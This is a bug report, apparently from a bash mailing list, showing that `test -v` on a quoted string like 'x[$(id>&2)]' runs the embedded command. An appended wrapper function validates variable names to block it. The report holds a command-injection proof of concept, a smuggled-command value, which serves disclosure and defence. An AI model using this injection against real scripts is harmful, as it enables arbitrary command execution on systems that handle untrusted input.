Arbitrary command execution from test on a quoted string
From: elettrino
Subject: Arbitrary command execution from test on a quoted string
Date: Thu, 28 Oct 2021 20:33:22 +0000
The following shows an example of bash testing a quoted string and as a result
executing a command embedded in the string.
Here I used the command "id" to stand as an example of a command. The output of
id on this machine was as follows:
user@machine:~$ id
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
So to demonstrate:
user@machine:~$ USER_INPUT='x[$(id>&2)]'
user@machine:~$ test -v "$USER_INPUT"
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
This means that if variable USER_INPUT was indeed input from a user, the user
could execute an arbitrary command.
Also unexpected (and presumably related), bash is expanding the construct
inside single quote marks:
user@machine:~$ test -v 'x[$(id>&2)]'
uid=1519(user) gid=1519(user) groups=1519(user),100(users)
user@machine:~$
user@machine:~$ echo $BASH_VERSION
4.4.20(1)-release
user@machine:~$
I don't know whether this happens with anything other than the -v option with
test; I have not seen it happen under any other circumstance.
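An added example, not part of the original message: a wrapper that lets only a plain variable name reach `test -v`, so a string with a subscript like the one shown in the message is rejected before the shell can expand it. The function names `is_plain_name` and `is_set` and the sample inputs are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original message).
# Only a plain identifier may reach `test -v`; anything containing '[', '$',
# whitespace or other non-name characters is refused without being evaluated.

# Return 0 if $1 is a plain shell variable name, 1 otherwise.
is_plain_name() {
    case $1 in
        '' | [0-9]* | *[!A-Za-z0-9_]*) return 1 ;;
    esac
    return 0
}

# is_set NAME
#   0 = variable is set (possibly empty), 1 = unset,
#   2 = NAME rejected and never handed to the shell for expansion.
is_set() {
    is_plain_name "$1" || return 2
    if [ -n "${BASH_VERSION:-}" ]; then
        test -v "$1"    # no subscript can be present at this point
    else
        # Fallback for shells without `test -v`; eval is acceptable here
        # only because $1 has already been validated as a bare name.
        eval "[ -n \"\${$1+set}\" ]"
    fi
}

# Constructed sample inputs; the fourth is the string from the message.
sample_var=''
for candidate in sample_var surely_unset_name_42 1abc 'x[$(id>&2)]' ''; do
    rc=0
    is_set "$candidate" || rc=$?
    printf '%-22s -> %s\n' "[$candidate]" "$rc"
done
```

Callers should treat return code 2 as invalid input and stop, rather than folding it into "unset".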